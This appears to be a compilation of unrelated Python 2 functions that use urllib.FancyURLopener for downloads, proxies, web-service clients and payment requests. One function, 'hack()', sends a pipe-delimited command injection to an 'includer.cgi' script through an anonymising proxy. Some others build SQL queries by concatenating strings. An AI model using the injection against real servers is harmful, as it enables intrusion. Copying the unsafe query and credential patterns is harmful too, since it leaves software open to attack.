def request(self, host, handler, request_body, verbose=0): if not self.proxyurl is None: type, r_type = splittype(self.proxyurl) phost, XXX = splithost(r_type) puser_pass = None if '@' in phost: user_pass, phost = phost.split('@', 1) if ':' in user_pass: user, password = user_pass.split(':', 1) puser_pass = base64.encodestring( '%s:%s' % (unquote(user), unquote(password))).strip() urlopener = urllib.FancyURLopener({'http': 'http://%s' % phost}) if not puser_pass: urlopener.addheaders = [('User-agent', self.user_agent)] else: urlopener.addheaders = [('User-agent', self.user_agent), ('Proxy-authorization', 'Basic ' + puser_pass)] else: urlopener = urllib.FancyURLopener() if not self.mysessid is None: urlopener.addheaders.append( ("Cookie", "%s=%s" % (self.session_name, self.mysessid))) host = unquote(host) f = urlopener.open("http://%s%s" % (host, handler), request_body) self.verbose = verbose return self.parse_response(f)
def fetchBinary(url): fn = '' try: fn = os.path.join(DIR_USERDATA, os.path.basename(url)) fn = xbmc.translatePath(fn) fn = xbmc.makeLegalFilename(fn) log('fetchBinary() url=%s fn=%s' % (url, fn)) if not os.path.isfile(fn): opener = urllib.FancyURLopener() fn, resp = opener.retrieve(url, fn) opener.close() os.path.isfile(fn) except: msg = sys.exc_info()[1] print msg url = 'http://xbmc.svn.sourceforge.net/svnroot/xbmc/trunk/XBMC/skin/Project%20Mayhem%20III/media/defaultVideoBig.png' fn = os.path.join(DIR_USERDATA, 'defaultVideoBig.png') fn = xbmc.translatePath(fn) log('fetchBinary() url=%s fn=%s' % (url, fn)) if not os.path.isfile(fn): opener = urllib.FancyURLopener() fn, resp = opener.retrieve(url, fn) opener.close() os.path.isfile(fn) if fn and os.path.isfile(fn): return fn else: return ''
def __init__(self, code, cardUID, size): self.score = 0 #Need to get the iris template from the DB. #Initiates the opener to send the HTTP request. opener = urllib.FancyURLopener({}) #Send the request. #request = opener.open("http://192.168.0.19:44556/Service1.svc/getIrisHash/" + cardUID) request = opener.open( "http://192.168.43.114:44556/Service1.svc/getIrisHash/" + cardUID) response = request.read() #If the response is not empty. if response != "{\"getIrisHashResult\":\"\"}": answer = response[22:-2] #Run through the characters. for i in range(0, len(answer)): #Check if it's a match. if code[i] == answer[i]: self.score += 1 #If the score is above 80% if self.score >= (0.8 * size): #Then it's a match. self.outcome = "Match" #Attendance must then be recorded. #Initiates the opener to send the HTTP request. opener = urllib.FancyURLopener({}) #Send the request. #request = opener.open("http://192.168.0.19:44556/Service1.svc/takeAttendance/" + cardUID) request = opener.open( "http://192.168.43.114:44556/Service1.svc/takeAttendance/" + cardUID) response = request.read() #If the response is not empty. if response != "{\"takeAttendanceResult\":\"\"}": answer = response[24:-1] if answer == '0': #TODO Show rgb green print 'Student has attended.' self.outcome = 'Student has attended.' else: #TODO Show rgb red print 'Student has already attended.' self.outcome = 'Student has already attended.' else: #Then it's not a match #TODO rgb color must be red self.outcome = "No match"
def level20(): import urllib url = 'http://*****:*****@www.pythonchallenge.com/pc/hex/unreal.jpg' for i in [(30237,30337), (30284,30384), (30295,30395), (30313,30413),\ (2123456744,2123456788), (2123456712,2123456743)]: opener = urllib.FancyURLopener({}) opener.addheader('range', 'bytes=%d-%d' % i) f = opener.open(url) opener = urllib.FancyURLopener({}) opener.addheader('range', 'bytes=1152983631-1152983671') f = opener.open(url) open('data/level_20.zip', 'wb').write(f.read())
def Download_Benchmark_Algorithms(Benchmark): testfile = urllib.FancyURLopener() if Benchmark == 'idct': # Inverse Discrete Cosine Transform url = "http://express.ece.ucsb.edu/benchmark/jpeg/jpeg_idct_ifast_dfg__6.dot" DestinationFile = 'Benchmarks/idct.dot' elif Benchmark == 'fdct': # Forward Discrete Cosine Transform url = "http://express.ece.ucsb.edu/benchmark/jpeg/jpeg_fdct_islow_dfg__6.dot" DestinationFile = 'Benchmarks/fdct.dot' elif Benchmark == 'mi': # Matrix Inverse url = "http://express.ece.ucsb.edu/benchmark/mesa/invert_matrix_general_dfg__3.dot" DestinationFile = 'Benchmarks/mi.dot' else: print "THIS BENCHMARK IS NOT SUPPORTED..." return False if not os.path.isfile(DestinationFile): code = urllib.urlopen(url).code if code / 100 >= 4: print "BENCHMARK IS NOT AVAILABLE..." return False else: print "DOWNLOADING BENCHMARK..." testfile.retrieve(url, DestinationFile) print "FINISHED DOWNLOADING..." Config.TG_DOT_Path = DestinationFile Config.TG_Type = 'FromDOTFile' return True else: print "FILE ALREADY EXISTS..." Config.TG_DOT_Path = DestinationFile Config.TG_Type = 'FromDOTFile' return True
def hack(): print "[X] Connecting..." proxer = raw_input("Type your proxy (IP:PORT) here: ") proxy = {'http': 'http://' + proxer} # PROXY !!! (find here: http://www.aliveproxy.com/high-anonymity-proxy-list) print "[X] Proxing...", url = urllib.FancyURLopener(proxy) print "[OK]" print "[X] Sending exploit...", stack = url.open(host + "includer.cgi?=|" + send + "|") read = stack.read() print "[OK]" print "[X] Exploited !\n" t_file = open('temp.txt', 'w') print >> t_file, read t_file = open('temp.txt', 'r') for line in linecache.getlines("temp.txt"): if(line[0:16]=="document.write('"): print line[16:-4] elif(line[0:18]=="document.writeln('"): print line[18:-4] elif(line[0]=="<"): pass elif(line[0:2]=="*/"): pass elif(line[0:2]=="/*"): pass else: print line[:-1]
def search_A(request, type_of_record, page): url = "http://" + myhost + ":8000/api/search?name=" + request + "&class=" + type_of_record + "&page=" + page u = urllib.FancyURLopener(None) usock = u.open(url) rawdata = usock.read() usock.close() return rawdata
def checkStatus(self): resp = self.appServicePort.queryStatus(queryStatusRequest(self.JobID)) if resp._code == 8: # 8 = GramJob.STATUS_DONE descr = self.cmdForms['default'].descr descr.entryByName['status0']['widget'].configure(text=resp._message) webbrowser.open(resp._baseURL) descr.entryByName['status1']['widget'].configure(text=resp._baseURL, fg='Blue',cursor='hand1') def openurl(event): webbrowser.open(resp._baseURL) descr.entryByName['status1']['widget'].bind(sequence="<Button-1>", func=openurl) self.resp = self.appServicePort.getOutputs(getOutputsRequest(self.JobID)) descr.entryByName['WS_ProgressBar']['widget'].grid(sticky='ew', row=2, column=0) self.opener = urllib.FancyURLopener(cert_file=self.proxy_gama, key_file=self.proxy_gama) self.download_finished = False self.new_download = True self.file_counter = -1 inputs = [x for x in self.resp._outputFile if x._name[-3:] !='dlg'] if len(inputs) != len(self.resp._outputFile): for input in inputs: self.resp._outputFile.remove(input) self.download() return else: self.cmdForms['default'].descr.entryByName['status0']['widget'].\ configure(text = "Status: " + resp._message) self.cmdForms['default'].descr.entryByName['status1']['widget'].\ configure(text = "") self.vf.GUI.ROOT.after(5000, self.checkStatus)
def AddXbox360GamesIfMissing(): url = "http://www.gamezapp.org/webservice/xbox360" response = '' try: responseObject = urllib.FancyURLopener({}).open(url) response = responseObject.read() responseObject.close() except: LogEvent("Unable to connect to web service: " + url) return json_data = json.loads(response) ClearGames("Xbox360") for data in json_data: game_name = data['GameTitle'] game_type = data['GameType'] game_cover = data['GameCover'] db_path = os.path.join(os.path.abspath(""),"Gamez.db") sql = "SELECT count(ID) from games where game_name = '" + game_name.replace("'","''") + "' AND system='Xbox360'" connection = sqlite3.connect(db_path) cursor = connection.cursor() cursor.execute(sql) result = cursor.fetchall() recordCount = result[0][0] cursor.close() if(str(recordCount) == "0"): LogEvent("Adding XBOX 360 Game [" + game_name.replace("'","''") + "] to Game List") sql = "INSERT INTO games (game_name,game_type,system,cover) values('" + game_name.replace("'","''") + "','" + game_type + "','Xbox360','" + game_cover + "')" cursor = connection.cursor() cursor.execute(sql) connection.commit() cursor.close() return
def install(runas, uuid): shell_version = _shell_major_version() target = _extension_dir(runas, uuid) info = _extension_info(uuid) url = EXTENSION_BASE_URL + info['download_url'] log.debug('Downloading extension from {0}'.format(url)) group = _primary_group(runas) log.debug('Primary group for {0} is {1}'.format(runas, group['name'])) client = urllib.FancyURLopener() filename, response = client.retrieve(url) log.debug('Extracting extension from {0} to {1}'.format(filename, target)) try: if os.path.exists(target): log.debug('Removing existing extension dir {0}'.format(target)) shutil.rmtree(target) __salt__['archive.unzip'](filename, target) __salt__['cmd.run']([ 'chown', '-R', '{0}:{1}'.format(runas, group['name']), target, ], runas='root') finally: os.unlink(filename)
def download(url, destPath, addName=True, clear=False): global pbar redirectedUrl = urllib.urlopen(url).geturl() if redirectedUrl != url: print >> sys.stderr, "Redirected to", redirectedUrl destFileName = destPath if addName: destFileName = destPath + "/" + os.path.basename(redirectedUrl) if not os.path.exists(os.path.dirname(destFileName)): os.makedirs(os.path.dirname(destFileName)) if clear or not os.path.exists(destFileName): if os.path.exists(destFileName): # clear existing file os.remove(destFileName) print >> sys.stderr, "Downloading file", redirectedUrl, "to", destFileName widgets = [ FileTransferSpeed(), ' <<<', Bar(), '>>> ', Percentage(), ' ', ETA() ] pbar = ProgressBar(widgets=widgets, maxval=100) pbar.start() try: urllib.FancyURLopener().retrieve(redirectedUrl, destFileName, reporthook=downloadProgress) except IOError, e: print >> sys.stderr, e.errno print >> sys.stderr, "Error downloading file", redirectedUrl pbar.finish() pbar = None return None pbar.finish() pbar = None
def getSoup(url, proxylist=proxylist): for i in proxylist: proxy = {'': i} opener = urllib.FancyURLopener(proxy) html = opener.open(url).read() soup = BeautifulSoup(html) return soup
def download_media(media_type, url): if media_type: opener = urllib.FancyURLopener() path = './temp_vids/' + url.split('/')[-1] opener.retrieve(url, path) return path return None
def download(link, filename=None): """ Download a file from a link. If you want to download the contents to a file, supply C{filename}. The function will return that filename as a check. If you want to read the contents immediately from the url, just give the link, and a fileobject B{and} the url object will be returned. Remember to close the url after finishing reading! @parameter link: the url of the file @type link: string @parameter filename: the name of the file to write to (optional) @type filename: str @return: output filename(, url object) @rtype: string(, FancyURLopener) """ url = urllib.FancyURLopener() myfile, msg = url.retrieve(link, filename=filename) if filename is not None: url.close() return myfile else: return myfile, url
def get_html(url=''): if proxy_use == 1: opener = urllib.FancyURLopener( {'http': 'http://' + proxy_ip + ':' + proxy_port + '/'}) else: opener = urllib.FancyURLopener({}) opener.addheaders = [( 'User-agent', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1700.76 Safari/537.36' )] try: f = opener.open(url) return f.read() except Exception, e: print e return ''
def get_dropbox_links_in_webpage(url): print "about to fetch URL: ", url assert isinstance(url, basestring) opener = urllib.FancyURLopener({}) f = opener.open(url) content = f.read() results = re.findall(REGEX, content) results = list(set(results)) final_results = [] for result in results: shmodel_token = result[0] file_id = result[1] file_path_url_encoded = result[2] original_filpath = urllib.unquote(file_path_url_encoded) # note, we expect all non-directories to have a . in their name # this assumption may break things is_dir = '.' not in original_filpath view_url = DROPBOX_VIEW_URL % (shmodel_token, file_id, file_path_url_encoded) download_url = DROPBOX_DOWNLOAD_URL % (shmodel_token, file_id, file_path_url_encoded) direct_download_url = DROPBOX_DIRECT_DOWNLOAD_URL % ( shmodel_token, file_id, file_path_url_encoded) final_results.append( DropboxLink(shmodel_token, file_id, original_filpath, file_path_url_encoded, is_dir, view_url, download_url, direct_download_url)) return final_results
def get_url(self, url_data): """ Process an HTTP GET request given the full URL including XML and throw the response into a database ASAP in case something goes wrong during processing. @param url_data The url-encoded data string @type url_data str @return dictionary of response values indexed by name @rtype dict """ log_prefix = u'api_tools.get_url(): ' # Let's do this before the transaction just in case it causes trouble. rr = raw_response() # If we are using certificate authentication, this is where the magic happens if hasattr(settings, 'cert_file') and hasattr( settings, 'key_file') and settings.cert_file and settings.key_file: cert_args = { 'cert_file': settings.cert_file, 'key_file': settings.key_file, } else: cert_args = {} try: f = urllib.FancyURLopener(**cert_args).open( self.settings.url, url_data) except IOError, ioe: _logger.error(log_prefix + (u'IOError: [%s]' % unicode(ioe))) raise connection_error_exception
def __init__(self, config, section): log.debug('VOMSServer.__init__(): New VOMSServer created...') self.section = section self.vo = config.get(section, 'voname') self.serviceurl = config.get(section, 'service_location') self.certfile = config.get('main', 'cert_file') self.keyfile = config.get('main', 'key_file') self.strict = config.get('main', 'strict') self.ttl = config.get(section, 'ttl') try: self.httpproxy = config.get('main', 'httpproxy') except ConfigParser.NoOptionError: self.httpproxy = None opener = urllib.FancyURLopener(cert_file=self.certfile, key_file=self.keyfile) # Grab WSDL from service, for fixing. wsdlurl = "%s?wsdl" % self.serviceurl log.debug("VOMSServer.__init__(): wsdl url is %s" % wsdlurl) try: r = opener.open(wsdlurl) except IOError, ioe: log.critical( "VOMSServer.__init__(): IOError. '%s'. Do you have read access to private key? Network connectivity? Proxy?" % ioe) sys.exit()
def AddComingSoonGames(): comingSoonWebServiceUrl = "http://www.gamezapp.org/webservice/comingsoon" response = '' try: responseObject = urllib.FancyURLopener({}).open(comingSoonWebServiceUrl) response = responseObject.read() responseObject.close() except: LogEvent("Unable to connect to web service: " + comingSoonWebServiceUrl) return json_data = json.loads(response) ClearComingSoonGames() for data in json_data: game_name = data['GameTitle'] release_date = data['ReleaseDate'] system = data['System'] db_path = os.path.join(os.path.abspath(""),"Gamez.db") sql = "SELECT count(ID) from comingsoon where gametitle = '" + game_name.replace("'","''") + "' AND system='" + system + "'" connection = sqlite3.connect(db_path) cursor = connection.cursor() cursor.execute(sql) result = cursor.fetchall() recordCount = result[0][0] cursor.close() if(str(recordCount) == "0"): LogEvent("Adding " + system + " Game [" + game_name.replace("'","''") + "] to Coming Soon Game List") sql = "INSERT INTO comingsoon (gametitle,releasedate,system) values('" + game_name.replace("'","''") + "','" + release_date + "','" + system + "')" cursor = connection.cursor() cursor.execute(sql) connection.commit() cursor.close() return
def _listReturn(self, methodname, **kwargs): """ Private method used to handle calls that return a list of items. """ log.debug("VOMSServer._listReturn(%s): Begin..." % methodname) keys = kwargs.keys() params = "" for k in keys: log.debug("VOMSServer._listReturn(%s): Kwargs: key: %s val: %s" % (methodname, k, kwargs[k])) params += "&%s=%s" % (k, kwargs[k]) openurl = "%smethod=%s%s" % (self.serviceurl, methodname, params) log.debug("VOMSServer._listReturn(%s): opening url %s" % (methodname, openurl)) opener = urllib.FancyURLopener(key_file=self.keyfile, cert_file=self.certfile) log.debug('VOMSServer._listReturn(%s): Contacting VOMS server...' % methodname) r = opener.open(openurl) s = r.read() log.debug("VOMSServer._listReturn(%s): XML response: \n%s" % (methodname, s)) xmldoc = parseString(s) items = xmldoc.getElementsByTagName("item") anslist = [] for i in items: d = i.childNodes[0].data anslist.append(d) return anslist
def process(self): encoded_args = urllib.urlencode(self.parameters) if self.proxy == None: results = str(urllib.urlopen(self.url, encoded_args).read()).split(self.delimiter) else: opener = urllib.FancyURLopener(self.proxy) opened = opener.open(self.url, encoded_args) try: results += str(opened.read()).split(self.delimiter) finally: opened.close() for result in results: (key,val) = result.split('=') self.results[key] = val if self.results['response'] == '1': self.error = False self.success = True self.declined = False elif self.results['response'] == '2': self.error = False self.success = False self.declined = True elif self.results['response'] == '3': self.error = True self.success = False self.declined = False else: self.error = True self.success = False self.declined = False raise DowCommerce.DowCommerceError(self.results)
def listMembersSAX(self, group=None): """ Returns (Python) list of DNs members of <group>, or all members ofthe VO if group argument is omitted. Group must be given as path, e.g. /voname/group1 This method doesn't use a generic template because is uses SAX rather than DOM, for performance reasons. """ log.debug("VOMSServer.listMembers(): Begin...") if not group: group = "/%s" % self.vo openurl = "%smethod=listMembers&groupname=%s" % (self.serviceurl, group) log.debug("VOMSServer.listMembers: opening url %s" % openurl) opener = urllib.FancyURLopener(key_file=self.keyfile, cert_file=self.certfile) log.debug('VOMSServer.listMembers: Contacting VOMS server...') r = opener.open(openurl) s = r.read() log.debug('VOMSServer.listMembers: XML response: \n%s' % s) vmp = VOMSMembersParser() log.debug('VOMSServer.listMembers: Parsing VOMS server response...') vmp.parse(s) members = vmp.get_members() return members
def SendNotification(self, message, username, password): data = "CMD=SEND_NOTIFICATION&Username="******"&Password="******"&Message=" + urllib.quote_plus( message) url = 'http://riveu.com/API.aspx?' + data responseObject = urllib.FancyURLopener({}).open(url) responseObject.read() responseObject.close()
def download_version(version): """ Downloads and saves the kmotion version 'version' saving it in '/tmp/kmotion_update/upgrade.tar.gz' args : version ... the version string excepts : return : """ # download version url = 'http://kmotion-v2-code.googlecode.com/files/kmotion_' + version.replace( ' ', '_') + '.tar.gz' opener = urllib.FancyURLopener() try: f_obj = opener.open(url) gzip_file = f_obj.read() f_obj.close() except IOError: raise exit_('Can\'t download latest version from \'%s\' IOError' % url) # and save it checking('Saving version %s' % version) ok() try: os.mkdir('/tmp/kmotion_upgrade') f_obj = open('/tmp/kmotion_upgrade/upgrade.tar.gz', 'w') f_obj.write(gzip_file) f_obj.close() except IOError: raise exit_( 'Can\'t save latest version as /tmp/kmotion_upgrade/upgrade.tar.gz' )
def test_urllib(): # 发起GET请求 f = urllib.urlopen('http://www.baidu.com') print f.read() # GET请求,传于参数,来自官网 params = urllib.urlencode({'spam': 1, 'eggs': 2, 'bacon': 0}) # 参数字典 print '*' * 200 print params # GET f = urllib.urlopen('http://www.musi-cal.com/cgi-bin/query?%s' % params) print f.read() # POST请求,来自官网 f = urllib.urlopen('http://www.musi-cal.com/cgi-bin/query', params) print '*' * 200 print f.read() # 使用代理,来自官网,貌似不Work # proxies = {'http': 'http://proxy.example.com:8080/'} # opener = urllib.FancyURLopener(proxies) # f = opener.open('http://www.python.org') # print '*' * 200 # print f.read() # 不用代理,来自官网 opener = urllib.FancyURLopener({}) f = opener.open('http://www.python.org/') print '*' * 200 print f.read() # 下载到本地 f = urllib.urlretrieve('http://www.baidu.com') print '*' * 200 print f
def process(self): encoded_args = urllib.urlencode(self.parameters) if self.testmode == True: url = 'https://test.authorize.net/gateway/transact.dll' else: url = 'https://secure.authorize.net/gateway/transact.dll' if self.proxy == None: self.results += str(urllib.urlopen(url, encoded_args).read()).split(self.delimiter) else: opener = urllib.FancyURLopener(self.proxy) opened = opener.open(url, encoded_args) try: self.results += str(opened.read()).split(self.delimiter) finally: opened.close() Results = namedtuple('Results', 'ResultResponse ResponseSubcode ResponseCode ResponseText AuthCode \ AVSResponse TransactionID InvoiceNumber Description Amount PaymentMethod \ TransactionType CustomerID CHFirstName CHLastName Company BillingAddress \ BillingCity BillingState BillingZip BillingCountry Phone Fax Email ShippingFirstName \ ShippingLastName ShippingCompany ShippingAddress ShippingCity ShippingState \ ShippingZip ShippingCountry TaxAmount DutyAmount FreightAmount TaxExemptFlag \ PONumber MD5Hash CVVResponse CAVVResponse') self.response = Results(*tuple(r for r in self.results)[0:40]) if self.getResultResponseFull() == 'Approved': self.error = False self.success = True self.declined = False elif self.getResultResponseFull() == 'Declined': self.error = False self.success = False self.declined = True else: raise AIM.AIMError(self.response.ResponseText)
def worker(): while not abort_event.isSet(): try: (index, offset, nbytes) = tasks.get(block=False) for retry in range(5): try: request = urllib.FancyURLopener() if offset > 0: request.addheader("Range", "bytes=%s-" % offset) page = request.open(url) data = page.read(nbytes) page.close() chunks.put((index, data)) if ratelimit: ratelimit.checkpoint(nbytes) break # Chunk successfully feteched. except Exception: _log.exception("Exception in download worker") else: raise RuntimeError("Failed to download %s:%s from %s" % (offset, nbytes, url)) except Queue.Empty: break except Exception: _log.exception("Exception in download worker") abort_event.set() break
def getUrlAndFilenameByTid(browser, tid): logging.debug("requesting url, filename and filesize of TID %s" % tid) url = ( '/STV/M/obj/cRecordOrder/croGetAdFreeAvailable.cfm?null.GetAdFreeAvailable&=&ajax=true&c0-id=' '' + getIdent() + '&c0-methodName=GetAdFreeAvailable&c0-param0=number%3A' '' + tid + '&c0-scriptName=null&callCount=1&clientAuthenticationKey=&xml=true') response = browser.open(url) status = re.search("_\d+_\d+ = '(\d)';", response.get_data()).group(1) if not int(status) == 1: logging.debug( "skipping TID %s, no advertise-free version available at the moment" % tid) return (None, None, None) url = ( '/STV/M/obj/cRecordOrder/croGetDownloadUrl.cfm?null.GetDownloadUrl&ajax=true&c0-id=' '' + getIdent() + '&c0-methodName=GetDownloadUrl&c0-param0=number%3A' '' + tid + '&c0-param1=number%3A0&c0-param2=boolean%3Atrue&c0-scriptName=null&callCount=1&clientAuthenticationKey=&xml=true' ) response = browser.open(url) url = re.search("(http://[^']*?m=dl[^']*)", response.get_data()).group() d = urllib.FancyURLopener().open(url) filename = d.headers['Content-Disposition'].split("filename=")[1] filesize = d.headers['Content-Length'] d.close() logging.debug("TID=%s, URL=%s" % (tid, url)) logging.debug("TID=%s, FILENAME=%s" % (tid, filename)) logging.debug("TID=%s, FILESIZE=%s" % (tid, filesize)) return (url, filename, filesize)
def download_latest_pkg(self): if self.category == 'APP': path = config['app_path'] elif self.category == 'TA': path = config['ta_path'] elif self.category == 'SA': path = config['sa_path'] else: print self.category + ' download path not found in config' exit() if not os.path.exists(path): os.makedirs(path) pkg_dir = os.path.join(path, self.name) if not os.path.exists(pkg_dir): os.makedirs(pkg_dir) pkg_path = os.path.join(pkg_dir, self.get_latest_pkg_name()) if os.path.exists(pkg_path): # already downloaded pass else: try: fuo = urllib.FancyURLopener() stdout.write('waiting for downloading') stdout.flush() fuo.retrieve(self.get_latest_pkg_url(), pkg_path, _report_hook) except urllib.ContentTooShortError as err: print 'failed to download the whole file. Please check your network connection or make sure there is enough disk space' logger.error('failed to download {url}. \n{err}'.format( url=self.get_latest_pkg_url(), err=str(err))) return pkg_path
def parsePLS(self, url): tmp = url.split('.') last = len(tmp) - 1 opener = urllib.FancyURLopener({}) f = opener.open(url) i = 1 items = {} if tmp[last].lower().rstrip() == 'pls': config = ConfigParser.RawConfigParser() config.readfp(f) numberOfItems = int(config.get('playlist', 'NumberOfEntries')) while i <= numberOfItems: items[i] = config.get('playlist', 'File' + str(i)) i += 1 elif tmp[last].lower().rstrip() == 'm3u': while True: line = f.readline() lineSplit = line.split(':') if (lineSplit[0].lower().rstrip() == 'http'): if line != ' ': items[i] = line.rstrip() i += 1 if line == '': break else: items[1] = url.rstrip() f.close() return items